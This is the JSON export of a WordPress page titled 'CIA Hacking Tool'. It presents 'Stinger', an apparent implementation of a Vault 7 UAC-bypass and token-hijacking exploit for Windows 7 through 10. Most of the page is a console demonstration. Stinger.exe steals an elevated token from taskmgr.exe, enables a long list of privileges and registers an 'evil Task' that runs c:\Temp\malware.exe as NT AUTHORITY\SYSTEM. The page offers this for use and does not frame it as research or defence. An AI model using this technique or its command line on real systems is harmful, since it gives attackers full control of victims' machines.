{"id":5,"date":"2024-06-11T06:33:24","date_gmt":"2024-06-11T06:33:24","guid":{"rendered":"https:\/\/cmd-right.com\/?page_id=5"},"modified":"2024-06-11T10:14:09","modified_gmt":"2024-06-11T10:14:09","slug":"cia-hacking-tool","status":"publish","type":"page","link":"https:\/\/cmd-right.com\/index.php\/cia-hacking-tool\/","title":{"rendered":"CIA Hacking Tool"},"content":{"rendered":"\n<p class=\"has-text-color has-link-color wp-elements-175f19bf87d3d24ef4b9ac841abbe48e\" style=\"color:#0d48f8\">     <a href=\"https:\/\/cmd-right.com\/index.php\/cia-how-to-archive\/\" target=\"_blank\" rel=\"noopener\" title=\"\">CIA &#8211; &#8220;How To&#8221; Archive<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading has-background has-body-font-family has-medium-font-size\" style=\"background-color:#ececec\"><strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-button-hover-color-color\">Stinger<\/mark><\/strong><\/h1>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-thumbnail has-custom-border\"><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" data-id=\"7\" src=\"https:\/\/cmd-right.com\/wp-content\/uploads\/2024\/06\/cia-150x150.png\" alt=\"cia logo\" class=\"wp-image-7\" style=\"border-width:18px;border-radius:100px\" srcset=\"https:\/\/cmd-right.com\/wp-content\/uploads\/2024\/06\/cia-150x150.png 150w, https:\/\/cmd-right.com\/wp-content\/uploads\/2024\/06\/cia-300x300.png 300w, https:\/\/cmd-right.com\/wp-content\/uploads\/2024\/06\/cia.png 400w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/figure>\n<\/figure>\n\n\n\n<p><mark style=\"background-color:rgba(0, 0, 0, 0);color:#504d4d\" class=\"has-inline-color\"><strong>User SID: S-1-5-21-3089230831-4110903467-601958294-1001<\/strong><\/mark><\/p>\n\n\n\n<p><strong>REFERENCES:<\/strong><\/p>\n\n\n\n<ul style=\"color:#0d48f8\" class=\"has-text-color has-link-color wp-elements-2055d0f9af826b5850dc476f34a206fb\">\n<li>[0]:\u00a0<a href=\"https:\/\/wikileaks.org\/ciav7p1\/cms\/page_20251107.html\" target=\"_blank\" rel=\"noopener\" title=\"\">Fine Dining Tool Mod0D48F8ule List, Vault 7, Wikileaks<\/a>.<\/li>\n\n\n\n<li>[1]:\u00a0Reading your way0D48F8 around UAC, James Forshaw.<\/li>\n<\/ul>\n\n\n\n<p>CIA Vault7 leak describes Stinger[0] as a Privilege Escalation module in the &#8220;Fine Dining&#8221; toolset. Stinger is a &#8220;UAC bypass that obtains the token from an auto-elevated process, modifies it, and reuses it to execute as administrator&#8221;. This is an implementation of Stinger, including debugging routines and additional tradecraft for&nbsp;<code>NT AUTHORITY\\SYSTEM<\/code>&nbsp;rights. The exploit works on Windows 7 through Windows 10 to run privileged code through token hijacking of an autoelevated process (e.g.&nbsp;<code>Taskmgr.exe<\/code>) from a UAC restricted process. This technique to steal a privileged token and elevate a thread also works on Windows 11, however it is not possible to use it for CreateProcessWithLogonW which detects&nbsp;<code>BAD IMPERSONATION<\/code>&nbsp;or with CreateFile, Registry, Process, COM ITask*, Named Pipes etc as the operations fail with&nbsp;<code>ACESS_DENIED<\/code>&nbsp;or&nbsp;<code>E_BAD_IMPERSONATION<\/code>. This exploit closely resembles UAC Magic[1] and thus it is believed that Stinger is an implementation of UAC Magic based on the description and time which it was used within the CIA for modular malware in &#8220;Fine Dining&#8221;. This is a tokenhijacking attack that bypasses UAC on Windows 7 -&gt; Windows 10, and on Windows 11 gives only an elevated thread to further experiment with. This exploit leverages a COM object ITaskService from the privileged thread to run commands under&nbsp;<code>NT AUTHORITY\\SYSTEM<\/code>.<\/p>\n\n\n\n<p>Here is an example of the UAC bypass being used on a vulnerable Windows 7 host.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><mark style=\"background-color:rgba(0, 0, 0, 0);color:#504d4d\" class=\"has-inline-color\">Microsoft Windows &#91;Version 6.1.7601]\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\n\nC:\\Users\\TestUser\\Downloads>whoami \/priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                Description                          State\n============================= ==================================== ========\nSeShutdownPrivilege           Shut down the system                 Disabled\nSeChangeNotifyPrivilege       Bypass traverse checking             Enabled\nSeUndockPrivilege             Remove computer from docking station Disabled\nSeIncreaseWorkingSetPrivilege Increase a process working set       Disabled\nSeTimeZonePrivilege           Change the time zone                 Disabled\n\nC:\\Users\\TestUser\\Downloads>Stinger.exe taskmgr.exe cmd.exe \/c c:\\\\Temp\\\\malware.exe\nShow our process security context...\nUser: TestUser\nDomain: TESTPC\nUser SID: S-1-5-21-3089230831-4110903467-601958294-1001\nChecking token DACL...\nAllowed ACE: GENERIC_ALL\nAccount: TESTPC\\TestUser\nSID: S-1-5-21-3089230831-4110903467-601958294-1001\nAllowed ACE: GENERIC_ALL\nAccount: NT AUTHORITY\\SYSTEM\nSID: S-1-5-18\nAllowed ACE: GENERIC_READ GENERIC_EXECUTE\nLookupAccountSid failed: 1332\nSID: S-1-5-5-0-107317\nToken is not elevated.\nToken is not restricted\nDumping token privileges...\n&#91;-] Disabled Privilege: SeShutdownPrivilege Attributes : 0\n&#91;+] Enabled Privilege: SeChangeNotifyPrivilege Attributes : 3\n    This privilege is enabled by default.\n&#91;-] Disabled Privilege: SeUndockPrivilege Attributes : 0\n&#91;-] Disabled Privilege: SeIncreaseWorkingSetPrivilege Attributes : 0\n&#91;-] Disabled Privilege: SeTimeZonePrivilege Attributes : 0\nProcess ID: 3992\nSuccessfully duplicated token\nH4x0r1nG the token ...\nEnabling privilege: SeIncreaseQuotaPrivilege\nEnabling privilege: SeSecurityPrivilege\nEnabling privilege: SeTakeOwnershipPrivilege\nEnabling privilege: SeLoadDriverPrivilege\nEnabling privilege: SeSystemProfilePrivilege\nEnabling privilege: SeSystemtimePrivilege\nEnabling privilege: SeProfileSingleProcessPrivilege\nEnabling privilege: SeIncreaseBasePriorityPrivilege\nEnabling privilege: SeCreatePagefilePrivilege\nEnabling privilege: SeBackupPrivilege\nEnabling privilege: SeRestorePrivilege\nEnabling privilege: SeShutdownPrivilege\nEnabling privilege: SeDebugPrivilege\nEnabling privilege: SeSystemEnvironmentPrivilege\nEnabling privilege: SeChangeNotifyPrivilege\nEnabling privilege: SeRemoteShutdownPrivilege\nEnabling privilege: SeUndockPrivilege\nEnabling privilege: SeManageVolumePrivilege\nEnabling privilege: SeImpersonatePrivilege\nEnabling privilege: SeCreateGlobalPrivilege\nEnabling privilege: SeIncreaseWorkingSetPrivilege\nEnabling privilege: SeTimeZonePrivilege\nEnabling privilege: SeCreateSymbolicLinkPrivilege\nDropping IL...\nInitialized medium IL SID\nToken lowered to medium integrity\nCOM init...\nAttemping to bypass UAC with the token...\nImpersonateLoggedOnUser succeeded.. \nDumping our new security context..\nUser: TestUser\nDomain: TESTPC\nUser SID: S-1-5-21-3089230831-4110903467-601958294-1001\nChecking token DACL...\nAllowed ACE: GENERIC_ALL\nAccount: BUILTIN\\Administrators\nSID: S-1-5-32-544\nAllowed ACE: GENERIC_ALL\nAccount: NT AUTHORITY\\SYSTEM\nSID: S-1-5-18\nAllowed ACE: GENERIC_READ GENERIC_EXECUTE\nLookupAccountSid failed: 1332\nSID: S-1-5-5-0-107317\nToken is elevated!\nToken is not restricted\nDumping token privileges...\n&#91;+] Enabled Privilege: SeIncreaseQuotaPrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeSecurityPrivilege Attributes : 2\n&#91;-] Disabled Privilege: SeTakeOwnershipPrivilege Attributes : 0\n&#91;-] Disabled Privilege: SeLoadDriverPrivilege Attributes : 0\n&#91;+] Enabled Privilege: SeSystemProfilePrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeSystemtimePrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeProfileSingleProcessPrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeIncreaseBasePriorityPrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeCreatePagefilePrivilege Attributes : 2\n&#91;-] Disabled Privilege: SeBackupPrivilege Attributes : 0\n&#91;-] Disabled Privilege: SeRestorePrivilege Attributes : 0\n&#91;+] Enabled Privilege: SeShutdownPrivilege Attributes : 2\n&#91;-] Disabled Privilege: SeDebugPrivilege Attributes : 0\n&#91;+] Enabled Privilege: SeSystemEnvironmentPrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeChangeNotifyPrivilege Attributes : 3\n    This privilege is enabled by default.\n&#91;+] Enabled Privilege: SeRemoteShutdownPrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeUndockPrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeManageVolumePrivilege Attributes : 2\n&#91;-] Disabled Privilege: SeImpersonatePrivilege Attributes : 0\n&#91;+] Enabled Privilege: SeCreateGlobalPrivilege Attributes : 3\n    This privilege is enabled by default.\n&#91;+] Enabled Privilege: SeIncreaseWorkingSetPrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeTimeZonePrivilege Attributes : 2\n&#91;+] Enabled Privilege: SeCreateSymbolicLinkPrivilege Attributes : 2\nAttemping to run command as NT AUTHORITY\\SYSTEM via COM...\nCreated ITaskService..\nConnected to ITaskService..\nRegistering the evil Task..\nTask created successfully.\nExecuted command as NT AUTHORITY\\SYSTEM... wait for cleanup\nTask deleted successfully. \n<\/mark><\/code><\/pre>\n\n\n\n<p>Your commands have executed under&nbsp;<code>NT AUTHORITY\\SYSTEM<\/code>. Happy New Year!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>CIA &#8211; &#8220;How To&#8221; Archive Stinger User SID: S-1-5-21-3089230831-4110903467-601958294-1001 REFERENCES: CIA Vault7 leak describes Stinger[0] as a Privilege Escalation module in the &#8220;Fine Dining&#8221; toolset. Stinger is a &#8220;UAC bypass that obtains the token from an auto-elevated process, modifies it, and reuses it to execute as administrator&#8221;. This is an implementation of Stinger, including debugging [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/pages\/5"}],"collection":[{"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/comments?post=5"}],"version-history":[{"count":4,"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/pages\/5\/revisions"}],"predecessor-version":[{"id":47,"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/pages\/5\/revisions\/47"}],"wp:attachment":[{"href":"https:\/\/cmd-right.com\/index.php\/wp-json\/wp\/v2\/media?parent=5"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}